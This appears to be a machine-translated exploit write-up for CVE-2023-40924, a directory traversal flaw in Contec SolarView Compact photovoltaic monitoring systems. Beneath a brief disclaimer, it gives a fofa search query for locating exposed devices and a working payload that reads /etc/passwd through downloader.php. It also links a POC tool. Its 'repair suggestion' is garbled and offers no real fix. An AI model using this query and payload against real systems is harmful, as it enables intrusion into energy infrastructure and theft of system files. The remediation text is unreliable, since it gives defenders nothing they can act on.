Recurrence of directory traversal vulnerability CVE-2023-40924 in Japan's SolarView Compact photovoltaic power generation measurement system
Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.
1. System introduction
Contec is a company focusing on customized embedded computing, industrial automation and IoT communication technologies. Contec SolarView Compact is an application system from Contec that can be used for remote performance monitoring, troubleshooting, system optimization and other functions to remotely manage renewable energy production units.
2. Vulnerability description
Attackers exploit this vulnerability through downloader.php. The file parameter is passed through the directory to read sensitive files.
3. Affected versions
SolarView Compact < 6.00
4. fofa query statement
body=“SolarView Compact” && title=“Top”
5. Vulnerability recurrence
The browser directly presses Enter
to capture the BURP packet.
6.POC&EXP
/downloader.php?file=…/…/…/…/…/…/…/…/etc/passwd%00.jpg
Xiaolong POC Portal [Updated]: Xiaolong POC Tool
7. Repair suggestions
Don't discharge randomly